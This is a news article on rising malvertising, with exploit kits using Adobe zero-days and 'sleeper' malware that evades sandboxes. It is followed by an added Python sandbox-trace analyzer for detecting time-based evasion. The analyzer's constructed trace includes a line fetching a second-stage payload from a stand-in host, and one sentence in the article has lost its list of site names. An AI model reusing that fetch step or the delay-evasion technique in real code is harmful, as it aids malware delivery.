Malvertising campaigns have reached more users than ever

Malvertising (from “malicious advertising”) is the use of online advertising to spread malware. Malvertising involves injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages.

Malvertising campaigns have reached more users than ever before, reported security firm Invincea yesterday, with many brand-name websites affected -- including CBS Sports, Yahoo and eBay in the UK, Livestrong, Perez Hilton, Glenn Beck's and the Drudge Report.

The company monitors over 2 million endpoints for suspicious activity. Not only is there more malvertising than before, from more high-profile sites, but most of the malware was new to antivirus vendors.

The reason is that advertising companies have been coming down hard on click fraud, blacklisting machines when they spot them. That makes those machines useless for click fraud, so the fraudsters move on to something else.

Keeping patches up to date and avoiding suspicious sites aren't effective defenses against these attackers: not only do they go after brand-name, popular websites, but they are also using zero-day exploits.

"Most of the malvertising that we saw in June appears to be delivered by an exploit kit using the latest Adobe zero day. Adobe released a patch last week for June's zero days, but the attackers have already found three new zero days, and have already updated their exploit kits."

The specific websites serving up the malware included,,,, eBay UK, Verizon FiOS homepage,, and Glenn Beck’s

The websites themselves were not hacked and, for the most part, the publishers were unaware of the malicious activity, as the criminals got in through the advertising networks.

However, there were also other websites that were attacked directly, mostly as a result of known flaws in WordPress themes and plugins, and were used to deliver malware as well.

Another tactic that is becoming more common with attackers is that of "sleeper" malware, which lies dormant after download for 14 hours or longer, in order to evade network sandboxes looking for suspicious activity.
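The sleeper technique works because a sandbox only watches a sample for a few minutes, so a sample that requests hours of delay before doing anything finishes its analysis run with a clean-looking report. The following is an added example, not code from the article or from Invincea, showing the defender-side check that production sandboxes build in: read the sample's API-call trace, add up the delay it asked for, and flag it when the first real action is gated behind more delay than the observation window allows. The trace line format, the sample trace, the `ACTION_APIS` set and the five-minute window are constructed assumptions for this example.

```python
# Added example (not from the article, and not Invincea's tooling): a small
# analyzer that reads a sandbox API-call trace and flags samples whose
# requested delays exceed the time the sandbox will actually watch them.
# The trace format and the sample lines below are constructed for this example.
from dataclasses import dataclass, field

# Delay primitives to account for. Units follow the documented Win32/NT
# signatures: milliseconds for Sleep/SleepEx/WaitForSingleObject, 100-ns
# intervals (negative = relative) for NtDelayExecution.
DELAY_APIS = {"Sleep", "SleepEx", "NtDelayExecution", "WaitForSingleObject"}
# Calls treated as the start of "real" behaviour (assumed set for this example).
ACTION_APIS = {"InternetOpenUrlA", "InternetOpenUrlW", "CreateProcessA",
               "CreateProcessW", "WriteFile", "URLDownloadToFileW"}


@dataclass
class Call:
    ts_ms: int                          # sandbox clock when the call was seen
    api: str
    args: dict = field(default_factory=dict)


def parse_trace(text):
    """Parse the constructed line format '<ts_ms> <api> key=val ...'."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        ts, api, *kv = line.split()
        args = dict(item.split("=", 1) for item in kv)
        calls.append(Call(int(ts), api, args))
    return calls


def requested_delay_ms(call):
    """Milliseconds the sample asked to wait in this call (0 if not a delay)."""
    if call.api in ("Sleep", "SleepEx", "WaitForSingleObject"):
        value = call.args.get("dwMilliseconds", "0")
        return 0 if value == "INFINITE" else int(value)
    if call.api == "NtDelayExecution":
        # DelayInterval is in 100-ns units; a negative value is relative to now
        return abs(int(call.args.get("DelayInterval", "0"))) // 10_000
    return 0


def analyze(calls, observation_window_ms):
    """Summarise delay behaviour against the sandbox's observation window."""
    total = 0
    first_action = None
    delay_before_action = None
    for call in calls:
        total += requested_delay_ms(call)
        if first_action is None and call.api in ACTION_APIS:
            first_action = call.api
            delay_before_action = total
    # Real behaviour only starts after more delay than we observe: a naive
    # sandbox would time out and report nothing suspicious.
    gated = (delay_before_action is not None
             and delay_before_action > observation_window_ms)
    return {
        "total_delay_ms": total,
        "delay_calls": sum(1 for c in calls if c.api in DELAY_APIS),
        "first_action": first_action,
        "delay_before_action_ms": delay_before_action,
        "exceeds_window": total > observation_window_ms,
        "verdict": ("time-based evasion suspected" if gated
                    else "no delay gating seen"),
    }


# Constructed trace: one minute of Sleep, then a single relative
# NtDelayExecution of 14 hours (50,400,000 ms = 504,000,000,000 x 100 ns),
# and only then the first network fetch.
SAMPLE_TRACE = """
0   GetTickCount
3   Sleep dwMilliseconds=60000
4   NtDelayExecution DelayInterval=-504000000000
7   GetTickCount
9   InternetOpenUrlA lpszUrl=http://payload.example/stage2
12  WriteFile hFile=0x1c4
"""
SANDBOX_WINDOW_MS = 5 * 60 * 1000  # assumed few-minute detonation budget

if __name__ == "__main__":
    report = analyze(parse_trace(SAMPLE_TRACE), SANDBOX_WINDOW_MS)
    for key, value in report.items():
        print(f"{key}: {value}")
```

The check only accounts for delays the sample asks for explicitly; a sample that waits on a timer, a scheduled task, or a wall-clock comparison against `GetTickCount` shows no large requested delay here, which is why sandboxes pair sleep accounting with sleep skipping and clock acceleration rather than relying on this summary alone.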
